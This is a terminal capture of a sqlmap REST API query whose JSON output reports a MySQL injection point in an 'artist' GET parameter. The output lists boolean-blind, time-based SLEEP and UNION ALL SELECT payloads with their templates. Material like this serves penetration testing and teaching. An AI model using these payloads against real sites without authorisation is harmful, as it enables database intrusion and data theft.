[root@CentOS sqlmap-master]# curl http://127.0.0.1:8775/scan/6bccaf0fe2043330/data
{
“data”: [
{
“status”: 1,
“type”: 0,
“value”: [
{
“dbms”: “MySQL”,
“suffix”: “”,
“clause”: [
1
],
“ptype”: 1,
“dbms_version”: [
“>= 5.0.12”
],
“prefix”: “”,
“place”: “GET”,
“os”: null,
“conf”: {
“string”: null,
“notString”: null,
“titles”: false,
“regexp”: null,
“textOnly”: false,
“optimize”: false
},
“parameter”: “artist”,
“data”: {
“1”: {
“comment”: “”,
“matchRatio”: 0.71399999999999997,
“title”: “AND boolean-based blind – WHERE or HAVING clause”,
“templatePayload”: null,
“vector”: “AND [INFERENCE]”,
“where”: 1,
“payload”: “artist=1 AND 2672=2672”
},
“5”: {
“comment”: “”,
“matchRatio”: 0.71399999999999997,
“title”: “MySQL >= 5.0.12 AND time-based blind (SELECT)”,
“templatePayload”: null,
“vector”: “AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])”,
“where”: 1,
“payload”: “artist=1 AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))hKsS)”
},
“6”: {
“comment”: “– “,
“matchRatio”: 0.71399999999999997,
“title”: “Generic UNION query (NULL) – 1 to 20 columns”,
“templatePayload”: null,
“vector”: [
0,
3,
“– “,
“”,
“”,
“NULL”,
2,
true,
false
],
“where”: 2,
“payload”: “artist=-6479 UNION ALL SELECT CONCAT(0x7171767a71,0x7a6d7378465941786759,0x717a6b7a71),NULL,NULL– ”
}
}
}
]
}
],
“success”: true,
“error”: []